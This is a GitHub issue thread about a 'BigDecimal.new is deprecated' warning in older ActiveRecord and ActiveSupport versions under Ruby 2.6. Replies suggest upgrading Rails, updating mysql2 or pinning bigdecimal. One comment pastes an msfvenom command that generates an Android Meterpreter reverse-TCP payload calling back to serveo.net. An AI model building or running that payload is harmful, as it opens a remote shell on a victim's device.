### ISSUE TITLE
Ruby 2.6.1 and activerecord-5.0.7.1 -  warning: BigDecimal.new is deprecated; use BigDecimal() method instead

### ISSUE THREAD

**Issue by Sega100500** [rails/rails#35144]
Linux Debian 8.11
Apache 2.4
Ruby 2.6.1

In ```activerecord-5.0.7.1```:

**App 29622 output: /home/ruby/.rbenv/versions/2.6.1/lib/ruby/gems/2.6.0/gems/activerecord-5.0.7.1/lib/active_record/connection_adapters/mysql
/database_statements.rb:37: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.**

**Comment by y-yagi** [comment]
This already fixed in latest Rails. Please upgrade your application. Thanks.

**Comment by alexznumber1** [comment]
Why do I get the same error as well?


BigDecimal.new is deprecated; use BigDecimal() method instead.

**Comment by gregmolnar** [comment]
@alexznumber1 you are not on the latest version of Rails probably.

**Comment by shaheem007** [comment]
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.

how to fix

**Comment by gregmolnar** [comment]
@shaheem007 you should use the latest of metasploit, or you can try to run `bundle update activesupport`  
By the way this is just a warning, so it is safe to just ignore it.

**Comment by Ynikolenko** [comment]
.rvm/gems/ruby-2.6.3/gems/activesupport-4.1.6/lib/active_support/core_ext/object/duplicable.rb:82: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
How fix is it?
Downgrade version ruby? Or what?

**Comment by ammaar-s63** [comment]
Ruby `2.6.5`
Rails `6.0.0`
.rvm/gems/ruby-2.6.5/gems/activerecord-5.1.2/lib/active_record/connection_adapters/mysql/database_statements.rb:28: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.

**Comment by gregmolnar** [comment]
@ammaar-s63 if you look at the warning, you can see it is still Active Record 5.1.2.

**Comment by NobodysNightmare** [comment]
Thanks to @stevebissett for pointing out something important [here](https://github.com/rails/rails/issues/38280):

> For anyone struggling with this issue, it appears that the issue is not actually related to Rails / ActiveRecord, but rather mysql2, and updating the gem has fixed the warnings.

**If you updated rails to latest and still see this warning, also update `mysql2`**.

**Comment by adisciple50** [comment]
gem 'bigdecimal', '1.3.5'

add that to your gemfile. got this somewhere else.

**Comment by abitrolly** [comment]
How to find out which dependency keeps `activesupport-4.2.11.3` which contains this bug?
